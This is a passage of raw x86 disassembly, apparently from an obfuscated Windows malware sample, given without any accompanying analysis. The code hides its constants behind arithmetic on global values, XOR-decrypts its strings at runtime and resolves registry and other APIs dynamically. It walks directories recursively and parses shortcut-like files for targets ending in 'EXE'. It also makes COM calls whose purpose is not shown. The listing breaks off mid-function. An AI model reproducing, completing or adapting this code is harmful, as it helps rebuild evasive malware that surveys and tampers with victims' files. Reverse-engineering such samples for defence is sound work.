loc_43DB82: ; CODE XREF: sub_43DA75+100�j
lea eax, [ebp+var_258]
push eax
lea eax, [ebp+var_268]
push eax
call ds:dword_44B778 ; FileTimeToSystemTime
movzx eax, [ebp+var_24E]
movzx edx, [ebp+var_250]
movsx ecx, word_44C174
add ecx, 35h
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_252]
movsx ecx, word_44C1A4
movsx esi, word_44C124
lea ecx, [ecx+esi+0Bh]
imul edx, ecx
mov ecx, dword_44C154
add ecx, 35h
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_256]
mov ecx, dword_44C268
add ecx, 1Ah
imul edx, ecx
mov ecx, dword_44C140
add ecx, 6
add ecx, dword_44C26C
imul edx, ecx
movsx ecx, word_44C0D8
mov esi, dword_44C168
lea ecx, [ecx+esi+3Ah]
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_258]
mov ecx, dword_44C270
add ecx, 8
imul edx, ecx
movsx ecx, word_44C150
add ecx, 16h
imul edx, ecx
mov ecx, dword_44C0C8
add ecx, 0Fh
add ecx, dword_44C194
imul edx, ecx
mov ecx, dword_44C10C
add ecx, 33h
add ecx, dword_44C1A0
imul edx, ecx
add eax, edx
mov [ebp+var_25C], eax
mov edx, ds:dword_446024
cmp eax, edx
ja loc_43DD8B
sub edx, eax
movsx eax, word_44C27C
mov ecx, dword_44C128
lea eax, [eax+ecx+7]
cmp edx, eax
jnb loc_43DD8B
movsx eax, word_44C264
add eax, 9Bh
cmp [ebp+arg_24], eax
jz short loc_43DCB0
push 0
push [ebp+arg_0]
call sub_43CF47
add esp, 8
jmp loc_43DD8B
; ---------------------------------------------------------------------------
loc_43DCB0: ; CODE XREF: sub_43DA75+227�j
push 1
push [ebp+arg_0]
call sub_43CF47
add esp, 8
jmp loc_43DD8B
; ---------------------------------------------------------------------------
loc_43DCC2: ; CODE XREF: sub_43DA75+68�j
cmp [ebp+var_112], 2Eh
jz loc_43DD87
push offset word_44D246
call sub_43E507
lea edi, [ebp+var_112]
push edi
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call ds:dword_44B634
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_43DA75
add esp, 158h
jmp short loc_43DD87
; ---------------------------------------------------------------------------
loc_43DD1B: ; CODE XREF: sub_43DA75+314�j
lea eax, [ebp+var_13E]
push eax
push [ebp+var_248]
call ds:dword_447004 ; FindNextFileA
mov ebx, eax
or ebx, ebx
jz short loc_43DD8B
cmp [ebp+var_112], 2Eh
jz short loc_43DD87
push offset byte_44D23D
call sub_43E507
lea edi, [ebp+var_112]
push edi
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call ds:dword_44B634
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_43DA75
add esp, 158h
loc_43DD87: ; CODE XREF: sub_43DA75+254�j
; sub_43DA75+2A4�j ...
or ebx, ebx
jnz short loc_43DD1B
loc_43DD8B: ; CODE XREF: sub_43DA75+7B�j
; sub_43DA75+B0�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_43DA75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DD90 proc near ; CODE XREF: sub_43F357+190�p
var_12110 = byte ptr -12110h
var_1210C = word ptr -1210Ch
var_1210A = word ptr -1210Ah
var_12108 = dword ptr -12108h
var_12104 = byte ptr -12104h
var_12000 = word ptr -12000h
var_11FFE = byte ptr -11FFEh
var_1FFF = byte ptr -1FFFh
var_1FB3 = byte ptr -1FB3h
var_1FB2 = byte ptr -1FB2h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 12110h
call sub_444F6C
push ebx
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12104]
push eax
call sub_444F8C
lea ecx, [ebp+var_12104]
or eax, 0FFFFFFFFh
loc_43DDB8: ; CODE XREF: sub_43DD90+2D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43DDB8
movsx ebx, word_44C240
movsx edx, word_44C1C0
add ebx, edx
sub ebx, 5
mov esi, eax
sub esi, ebx
movsx ebx, word_44C0FC
movsx edx, word_44C160
add ebx, edx
sub ebx, 7
mov [ebp+esi+var_12104], bl
push 0
mov eax, dword_44C1E8
add eax, dword_44C0B8
sub eax, 4
push eax
push 3
push 0
mov eax, dword_44C0A0
movsx edx, word_44C1B4
add eax, edx
sub eax, 8
push eax
push 80000001h
lea eax, [ebp+var_12104]
push eax
call ds:dword_44B788 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_43E066
push 0
lea eax, [ebp+var_12110]
push eax
push 1FFFh
lea eax, [ebp+var_1FFF]
push eax
push edi
call ds:dword_446028 ; ReadFile
mov [ebp+var_12108], eax
push edi
call ds:dword_44A654 ; CloseHandle
mov eax, dword_44C1D0
sub eax, 7
cmp [ebp+var_12108], eax
jz loc_43E066
cmp [ebp+var_1FFF], 4Ch
jnz loc_43E066
movzx esi, [ebp+var_1FB3]
movzx ebx, [ebp+var_1FB2]
movzx ebx, bx
shl ebx, 8
or esi, ebx
mov [ebp+var_1210A], si
movzx eax, [ebp+var_1210A]
movsx edx, word_44C264
mov ecx, dword_44C1E4
lea edx, [edx+ecx+3Fh]
add eax, edx
movsx edx, word_44C150
add edx, dword_44C10C
sub edx, 0Ch
add eax, edx
mov [ebp+var_12000], ax
movzx eax, [ebp+var_12000]
movsx eax, [ebp+eax+var_1FFF]
mov edx, dword_44C26C
sub edx, 9
cmp eax, edx
jz loc_43E066
movzx eax, [ebp+var_12000]
movsx edx, word_44C0BC
dec edx
add eax, edx
movsx eax, [ebp+eax+var_1FFF]
mov edx, dword_44C13C
sub edx, 2
cmp eax, edx
jnz loc_43E066
movzx eax, [ebp+var_12000]
mov edx, dword_44C268
add edx, 0Ch
mov ecx, eax
add ecx, edx
movzx edx, [ebp+ecx+var_1FFF]
movsx esi, word_44C1FC
lea esi, [eax+esi+0Ch]
movzx esi, [ebp+esi+var_1FFF]
movzx esi, si
shl esi, 8
mov ebx, edx
or ebx, esi
mov esi, ebx
movzx esi, si
mov ebx, eax
add ebx, esi
mov esi, ebx
mov [ebp+var_1210C], si
movzx eax, [ebp+var_1210C]
lea eax, [ebp+eax+var_1FFF]
push eax
lea eax, [ebp+var_11FFE]
push eax
call sub_444F8C
lea ecx, [ebp+var_11FFE]
or eax, 0FFFFFFFFh
loc_43DF87: ; CODE XREF: sub_43DD90+1FC�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43DF87
mov edi, eax
movsx eax, word_44C100
add eax, dword_44C228
sub eax, 2
mov edx, edi
sub edx, eax
cmp [ebp+edx+var_11FFE], 2Eh
jnz short loc_43E02B
mov eax, dword_44C0C8
movsx edx, word_44C218
add eax, edx
sub eax, 2
mov edx, edi
sub edx, eax
movsx eax, [ebp+edx+var_11FFE]
push eax
call ds:dword_446030
add esp, 4
cmp eax, 45h
jnz short loc_43E02B
mov esi, dword_44C1E8
movsx ebx, word_44C230
add esi, ebx
sub esi, 5
mov ebx, edi
sub ebx, esi
movsx esi, [ebp+ebx+var_11FFE]
push esi
call ds:dword_446030
add esp, 4
cmp eax, 58h
jnz short loc_43E02B
mov esi, dword_44C158
sub esi, 8
mov ebx, edi
sub ebx, esi
movsx esi, [ebp+ebx+var_11FFE]
push esi
call ds:dword_446030
add esp, 4
cmp eax, 45h
jz short loc_43E02D
loc_43E02B: ; CODE XREF: sub_43DD90+21C�j
; sub_43DD90+248�j ...
jmp short loc_43E066
; ---------------------------------------------------------------------------
loc_43E02D: ; CODE XREF: sub_43DD90+299�j
push offset dword_44D238
call sub_43E507
push eax
lea edi, [ebp+var_11FFE]
push edi
call ds:dword_446020
mov eax, dword_44C168
movsx edx, word_44C1A4
add eax, edx
sub eax, 7
push eax
lea eax, [ebp+var_11FFE]
push eax
call sub_44229C
add esp, 14h
loc_43E066: ; CODE XREF: sub_43DD90+9E�j
; sub_43DD90+DB�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_43DD90 endp
; =============== S U B R O U T I N E =======================================
sub_43E06B proc near ; DATA XREF: .data:0044C388�o
mov eax, 80004001h
retn 18h
sub_43E06B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E073 proc near ; CODE XREF: sub_43A55F:loc_43A562�p
var_252 = byte ptr -252h
var_236 = dword ptr -236h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
lea eax, [ebp+var_114]
push eax
mov eax, dword_44C0A0
sub eax, 4
push eax
push 0
push 20h
push 0
call ds:dword_448A44
lea eax, [ebp+var_10]
push eax
call ds:dword_44925C ; GetSystemTime
movzx eax, [ebp+var_6]
movzx edx, [ebp+var_8]
mov ecx, dword_44C274
add ecx, 33h
add ecx, dword_44C1EC
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_A]
mov ecx, dword_44C1AC
add ecx, 0Ch
movsx ebx, word_44C22C
add ecx, ebx
imul edx, ecx
mov ecx, dword_44C0F4
add ecx, 35h
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_E]
mov ecx, dword_44C09C
add ecx, 19h
imul edx, ecx
movsx ecx, word_44C1FC
add ecx, 13h
imul edx, ecx
mov ecx, dword_44C1F8
add ecx, 39h
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_10]
movsx ecx, word_44C104
movsx ebx, word_44C260
lea ecx, [ecx+ebx+2]
imul edx, ecx
mov ecx, dword_44C11C
add ecx, 16h
add ecx, dword_44C090
imul edx, ecx
mov ecx, dword_44C268
add ecx, 0Eh
movsx ebx, word_44C144
add ecx, ebx
imul edx, ecx
mov ecx, dword_44C110
add ecx, 37h
add ecx, dword_44C238
imul edx, ecx
add eax, edx
mov ds:dword_446024, eax
mov eax, dword_44C0E4
sub eax, 8
mov [ebp+var_236], eax
lea esi, [ebp+var_252]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_114]
push edi
call sub_43DA75
add esp, 144h
pop edi
pop esi
pop ebx
leave
retn
sub_43E073 endp
; =============== S U B R O U T I N E =======================================
sub_43E1A7 proc near ; DATA XREF: .data:0044C360�o
mov eax, 80004001h
retn 8
sub_43E1A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E1AF proc near ; DATA XREF: .data:0044C39C�o
push ebp
mov ebp, esp
push offset dword_448608
call ds:dword_448A3C ; InterlockedIncrement
mov eax, ds:dword_448608
pop ebp
retn 4
sub_43E1AF endp
; =============== S U B R O U T I N E =======================================
sub_43E1C6 proc near ; CODE XREF: sub_440C0A+2F�p
push edi
push offset dword_44D228
call sub_43E507
pop ecx
push eax
call ds:dword_4485E8 ; GetModuleHandleA
mov dword_44C2B8, eax
test eax, eax
jnz short loc_43E1F9
push offset dword_44D218
call sub_43E507
pop ecx
push eax
call ds:dword_449244 ; LoadLibraryA
mov dword_44C2B8, eax
loc_43E1F9: ; CODE XREF: sub_43E1C6+1A�j
push offset byte_44D207
call sub_43E507
push eax
push dword_44C2B8
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_4485EC, eax
push offset byte_44D1F3
call sub_43E507
push eax
push dword_44C2B8
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44603C, eax
push offset dword_44D1E4
call sub_43E507
push eax
push dword_44C2B8
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B618, eax
push offset dword_44D1D4
call sub_43E507
add esp, 10h
push eax
push dword_44C2B8
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_4485F0, eax
pop edi
retn
sub_43E1C6 endp
; =============== S U B R O U T I N E =======================================
sub_43E26E proc near ; CODE XREF: sub_440C0A+2A�p
push edi
push offset byte_44D1C5
call sub_43E507
pop ecx
push eax
call ds:dword_4485E8 ; GetModuleHandleA
mov dword_44C2B4, eax
test eax, eax
jnz short loc_43E2A1
push offset word_44D1B6
call sub_43E507
pop ecx
push eax
call ds:dword_449244 ; LoadLibraryA
mov dword_44C2B4, eax
loc_43E2A1: ; CODE XREF: sub_43E26E+1A�j
push offset word_44D1A2
call sub_43E507
pop ecx
push eax
push dword_44C2B4
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_448A44, eax
pop edi
retn
sub_43E26E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E2C0 proc near ; CODE XREF: sub_43CF47+26D�p
var_54 = byte ptr -54h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 54h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_43E2D7
add eax, 3Fh
loc_43E2D7: ; CODE XREF: sub_43E2C0+12�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
call sub_43C0EE
pop ecx
mov [ebp+var_14], eax
mov edi, [ebp+arg_4]
mov edx, dword_44C248
add edx, 3Ch
add edx, dword_44C270
mov eax, edi
add eax, edx
jge short loc_43E304
add eax, 3Fh
loc_43E304: ; CODE XREF: sub_43E2C0+3F�j
sar eax, 6
mov edi, dword_44C288
add edi, 3Ah
mov edx, eax
imul edx, edi
push edx
push [ebp+var_14]
call ds:dword_44602C ; RtlZeroMemory
push [ebp+arg_4]
push esi
push [ebp+var_14]
call ds:dword_44A638
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
call sub_444662
mov esi, [ebp+var_14]
mov ebx, dword_44C184
sub ebx, 2
jmp short loc_43E362
; ---------------------------------------------------------------------------
loc_43E346: ; CODE XREF: sub_43E2C0+BC�j
push esi
lea eax, [ebp+var_10]
push eax
call sub_444689
mov eax, dword_44C1E8
add eax, 39h
add eax, dword_44C14C
lea esi, [esi+eax]
inc ebx
loc_43E362: ; CODE XREF: sub_43E2C0+84�j
mov edi, [ebp+arg_4]
movsx edx, word_44C170
lea eax, [edi+edx+3Eh]
test eax, eax
jge short loc_43E377
add eax, 3Fh
loc_43E377: ; CODE XREF: sub_43E2C0+B2�j
sar eax, 6
cmp ebx, eax
jl short loc_43E346
push [ebp+var_14]
call sub_43A324
lea eax, [ebp+var_54]
push eax
push [ebp+arg_8]
call sub_43BDC4
movsx eax, word_44C0B0
add eax, 9
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
call ds:dword_44B64C
add esp, 18h
movsx edi, word_44C144
add edi, dword_44C14C
sub edi, 0Ch
cmp eax, edi
jz short loc_43E3C7
xor eax, eax
inc eax
jmp short loc_43E3C9
; ---------------------------------------------------------------------------
loc_43E3C7: ; CODE XREF: sub_43E2C0+100�j
xor eax, eax
loc_43E3C9: ; CODE XREF: sub_43E2C0+105�j
pop edi
pop esi
pop ebx
leave
retn
sub_43E2C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E3CE proc near ; CODE XREF: sub_441189+197�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push edi
lea eax, [ebp+var_4]
push eax
push 20019h
mov eax, dword_44C280
movsx edx, word_44C100
add eax, edx
sub eax, 7
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4485EC ; RegOpenKeyExA
mov edi, eax
or edi, edi
jz short loc_43E404
xor eax, eax
jmp short loc_43E431
; ---------------------------------------------------------------------------
loc_43E404: ; CODE XREF: sub_43E3CE+30�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call ds:dword_44603C ; RegQueryValueExA
mov edi, eax
push [ebp+var_4]
call ds:dword_44B618 ; RegCloseKey
or edi, edi
jz short loc_43E42E
xor eax, eax
jmp short loc_43E431
; ---------------------------------------------------------------------------
loc_43E42E: ; CODE XREF: sub_43E3CE+5A�j
xor eax, eax
inc eax
loc_43E431: ; CODE XREF: sub_43E3CE+34�j
; sub_43E3CE+5E�j
pop edi
leave
retn
sub_43E3CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E434 proc near ; CODE XREF: sub_43A58C+DA�p
; sub_43A58C+510�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, [ebp+arg_4]
push ebx
call ds:dword_446000 ; lstrlenW
mov edi, eax
push 0
push 0
movsx eax, word_44C0CC
add eax, 1FF8h
push eax
push esi
push edi
push ebx
mov eax, dword_44C12C
add eax, dword_44C194
sub eax, 11h
push eax
push 0
call ds:dword_44600C ; WideCharToMultiByte
mov eax, dword_44C19C
add eax, dword_44C21C
sub eax, 0Eh
mov [esi+edi], al
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_43E434 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E48C proc near ; DATA XREF: .data:off_44C398�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
push offset dword_44DAC8
push esi
call ds:dword_44B648
or eax, eax
jz short loc_43E4B8
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43E500
; ---------------------------------------------------------------------------
loc_43E4B8: ; CODE XREF: sub_43E48C+1A�j
push offset dword_44DA48
push esi
call ds:dword_44B648
or eax, eax
jz short loc_43E4D8
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43E500
; ---------------------------------------------------------------------------
loc_43E4D8: ; CODE XREF: sub_43E48C+3A�j
push offset dword_44DA08
push esi
call ds:dword_44B648
or eax, eax
jz short loc_43E4F8
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43E500
; ---------------------------------------------------------------------------
loc_43E4F8: ; CODE XREF: sub_43E48C+5A�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_43E500: ; CODE XREF: sub_43E48C+2A�j
; sub_43E48C+4A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_43E48C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E507 proc near ; CODE XREF: sub_43A58C+298�p
; sub_43A58C+38B�p ...
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp dword_44C290, 0
jnz short loc_43E52F
push offset dword_44BBC0
call ds:dword_447008 ; InitializeCriticalSection
mov dword_44C290, 1
loc_43E52F: ; CODE XREF: sub_43E507+11�j
movsx esi, word_44C1F0
movsx ebx, word_44C0CC
add esi, ebx
sub esi, 7
movzx ebx, byte ptr [edi]
movzx edx, byte ptr [edi+1]
movzx edx, dx
shl edx, 8
or ebx, edx
movzx ebx, bx
add esi, ebx
mov [ebp+var_4], si
movzx eax, [ebp+var_4]
cmp eax, dword_44C0B8
jz short loc_43E5E2
push offset dword_44BBC0
call ds:dword_44B660 ; RtlEnterCriticalSection
mov eax, dword_44C220
dec eax
mov [ebp+var_2], ax
jmp short loc_43E592
; ---------------------------------------------------------------------------
loc_43E57D: ; CODE XREF: sub_43E507+95�j
movzx eax, [ebp+var_2]
add eax, edi
movsx edx, byte ptr [eax]
movsx ecx, byte ptr [edi+2]
xor edx, ecx
mov [eax], dl
inc [ebp+var_2]
loc_43E592: ; CODE XREF: sub_43E507+74�j
movzx eax, [ebp+var_2]
movzx edx, [ebp+var_4]
cmp eax, edx
jl short loc_43E57D
movsx eax, word_44C170
sub eax, 2
mov edx, dword_44C0F8
add edx, dword_44C12C
sub edx, 0Fh
mov [edi+eax], dl
mov eax, dword_44C128
sub eax, 8
mov edx, dword_44C25C
movsx ecx, word_44C1F0
add edx, ecx
sub edx, 0Bh
mov [edi+eax], dl
push offset dword_44BBC0
call ds:dword_44A650 ; RtlLeaveCriticalSection
loc_43E5E2: ; CODE XREF: sub_43E507+5D�j
lea eax, [edi+3]
pop edi
pop esi
pop ebx
leave
retn
sub_43E507 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E5EA proc near ; CODE XREF: sub_44206A+E�p
; sub_44206A+1E1�p
var_10088 = dword ptr -10088h
var_10084 = dword ptr -10084h
var_10080 = dword ptr -10080h
var_1007C = dword ptr -1007Ch
var_10078 = word ptr -10078h
var_10070 = dword ptr -10070h
var_10068 = dword ptr -10068h
var_10064 = dword ptr -10064h
var_10060 = dword ptr -10060h
var_10059 = byte ptr -10059h
var_10058 = dword ptr -10058h
var_10054 = dword ptr -10054h
var_10050 = dword ptr -10050h
var_1004C = dword ptr -1004Ch
var_10048 = dword ptr -10048h
var_10043 = byte ptr -10043h
var_44 = dword ptr -44h
var_40 = word ptr -40h
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10088h
call sub_444F6C
push ebx
push esi
push edi
mov [ebp+var_40], 8
push offset dword_44D194
call sub_441767
pop ecx
push eax
call ds:dword_446044
mov [ebp+var_38], eax
lea eax, [ebp+var_2C]
push eax
lea esi, [ebp+var_40]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_0]
push edi
mov edi, [edi]
call dword ptr [edi+30h]
mov ebx, eax
movsx eax, word_44C0FC
add eax, dword_44C154
sub eax, 0Dh
cmp ebx, eax
jz short loc_43E64E
xor eax, eax
jmp loc_43EC7A
; ---------------------------------------------------------------------------
loc_43E64E: ; CODE XREF: sub_43E5EA+5B�j
lea eax, [ebp+var_24]
push eax
push offset dword_44DA68
mov eax, [ebp+var_2C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44C208
add eax, dword_44C14C
sub eax, 0Bh
cmp ebx, eax
jnz loc_43EC6F
lea eax, [ebp+var_28]
push eax
mov eax, [ebp+var_24]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
mov eax, dword_44C090
movsx edx, word_44C170
add eax, edx
sub eax, 5
cmp ebx, eax
jnz loc_43EC66
and [ebp+var_44], 0
movsx eax, word_44C264
sub eax, 9
mov [ebp+var_1C], eax
jmp loc_43EC5A
; ---------------------------------------------------------------------------
loc_43E6BC: ; CODE XREF: sub_43E5EA+676�j
mov [ebp+var_18], 2
mov eax, [ebp+var_1C]
mov [ebp+var_10], eax
lea eax, [ebp+var_4]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_24]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
mov eax, dword_44C25C
add eax, dword_44C188
sub eax, 8
cmp ebx, eax
jnz loc_43EC57
and [ebp+var_10048], 0
lea eax, [ebp+var_10048]
push eax
push offset dword_44DA78
mov eax, [ebp+var_4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44C0A4
movsx edx, word_44C1C0
add eax, edx
sub eax, 0Ah
cmp ebx, eax
jnz loc_43EC33
cmp [ebp+var_10048], 0
jz loc_43EC33
lea eax, [ebp+var_20]
push eax
mov eax, [ebp+var_10048]
push eax
mov edi, [eax]
call dword ptr [edi+0F8h]
mov ebx, eax
or ebx, ebx
jnz loc_43EC33
lea eax, [ebp+var_10043]
push eax
push [ebp+var_20]
call sub_43E434
mov eax, dword_44C288
sub eax, 5
push eax
push offset dword_449230
lea eax, [ebp+var_10043]
push eax
call sub_43A4B5
add esp, 14h
mov edi, dword_44C280
add edi, 0FFFBh
cmp eax, edi
jz loc_43EC33
cmp [ebp+arg_4], 0
jz short loc_43E7D5
mov eax, [ebp+var_10048]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
xor eax, eax
inc eax
jmp loc_43EC7A
; ---------------------------------------------------------------------------
loc_43E7D5: ; CODE XREF: sub_43E5EA+1CC�j
and [ebp+var_1007C], 0
lea eax, [ebp+var_1007C]
push eax
push offset dword_44DA98
mov eax, [ebp+var_4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44C184
movsx edx, word_44C240
add eax, edx
sub eax, 4
cmp ebx, eax
jnz loc_43EC33
mov [ebp+var_10059], 44h
push offset byte_44D18B
call sub_43E507
movsx edi, word_44C0D8
dec edi
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_43A4B5
add esp, 10h
movsx esi, word_44C0CC
add esi, 0FFF8h
cmp eax, esi
jz short loc_43E852
mov [ebp+var_10059], 43h
loc_43E852: ; CODE XREF: sub_43E5EA+25F�j
push offset byte_44D183
call sub_43E507
movsx edi, word_44C1FC
sub edi, 4
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_43A4B5
add esp, 10h
mov esi, dword_44C0DC
inc esi
mov edi, eax
add edi, esi
mov [ebp+var_10068], edi
mov [ebp+var_10054], edi
loc_43E88E: ; CODE XREF: sub_43E5EA+2BA�j
mov eax, [ebp+var_10054]
cmp [ebp+eax+var_10043], 26h
jz short loc_43E8A6
inc [ebp+var_10054]
jmp short loc_43E88E
; ---------------------------------------------------------------------------
loc_43E8A6: ; CODE XREF: sub_43E5EA+2B2�j
mov eax, [ebp+var_10054]
movsx edx, word_44C150
movsx ecx, word_44C1F0
add edx, ecx
sub edx, 0Bh
mov [ebp+eax+var_10043], dl
mov eax, [ebp+var_10068]
lea eax, [ebp+eax+var_10043]
push eax
call ds:dword_446054
mov [ebp+var_10080], eax
push offset dword_44D17C
call sub_43E507
movsx edi, word_44C22C
movsx esi, word_44C260
add edi, esi
sub edi, 8
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_43A4B5
add esp, 14h
mov esi, dword_44C214
sub esi, 6
mov edi, eax
add edi, esi
mov [ebp+var_10068], edi
mov [ebp+var_10054], edi
loc_43E927: ; CODE XREF: sub_43E5EA+353�j
mov eax, [ebp+var_10054]
cmp [ebp+eax+var_10043], 26h
jz short loc_43E93F
inc [ebp+var_10054]
jmp short loc_43E927
; ---------------------------------------------------------------------------
loc_43E93F: ; CODE XREF: sub_43E5EA+34B�j
mov eax, [ebp+var_10054]
mov edx, dword_44C238
mov [ebp+eax+var_10043], dl
mov eax, [ebp+var_10068]
lea eax, [ebp+eax+var_10043]
push eax
call ds:dword_446054
pop ecx
mov [ebp+var_10060], eax
movsx eax, word_44C118
sub eax, 3
cmp [ebp+var_10080], eax
ja short loc_43E9EC
movsx eax, word_44C22C
add eax, dword_44C26C
sub eax, 10h
mov [ebp+var_1004C], eax
jmp short loc_43E9D8
; ---------------------------------------------------------------------------
loc_43E997: ; CODE XREF: sub_43E5EA+400�j
mov edi, [ebp+var_1004C]
mov esi, edi
shl esi, 2
cmp ds:dword_447130[esi], 0
jz short loc_43E9D2
mov edx, [ebp+var_10060]
cmp ds:dword_446060[esi], edx
jnz short loc_43E9D2
mov dl, ds:byte_448200[edi]
cmp dl, [ebp+var_10059]
jnz short loc_43E9D2
and ds:dword_447130[edi*4], 0
loc_43E9D2: ; CODE XREF: sub_43E5EA+3C0�j
; sub_43E5EA+3CF�j ...
inc [ebp+var_1004C]
loc_43E9D8: ; CODE XREF: sub_43E5EA+3AB�j
movsx eax, word_44C178
add eax, 3E4h
cmp [ebp+var_1004C], eax
jb short loc_43E997
loc_43E9EC: ; CODE XREF: sub_43E5EA+393�j
call ds:dword_44B770 ; GetTickCount
mov [ebp+var_10064], eax
mov eax, dword_44C280
sub eax, 4
mov [ebp+var_10050], eax
jmp short loc_43EA59
; ---------------------------------------------------------------------------
loc_43EA08: ; CODE XREF: sub_43E5EA+47F�j
mov edi, [ebp+var_10050]
shl edi, 2
cmp ds:dword_447130[edi], 0
jz short loc_43EA53
mov edi, ds:dword_44A660[edi]
movsx esi, word_44C104
add esi, 0EA58h
mov edx, dword_44C134
sub edx, 3
imul esi, edx
add edi, esi
cmp edi, [ebp+var_10064]
jnb short loc_43EA53
mov edi, [ebp+var_10050]
and ds:dword_447130[edi*4], 0
loc_43EA53: ; CODE XREF: sub_43E5EA+42F�j
; sub_43E5EA+459�j
inc [ebp+var_10050]
loc_43EA59: ; CODE XREF: sub_43E5EA+41C�j
mov eax, dword_44C200
add eax, 3E3h
cmp [ebp+var_10050], eax
jb short loc_43EA08
movsx eax, word_44C264
movsx edx, word_44C180
add eax, edx
sub eax, 0Dh
mov [ebp+var_10058], eax
jmp short loc_43EA9C
; ---------------------------------------------------------------------------
loc_43EA86: ; CODE XREF: sub_43E5EA+4C2�j
mov edi, [ebp+var_10058]
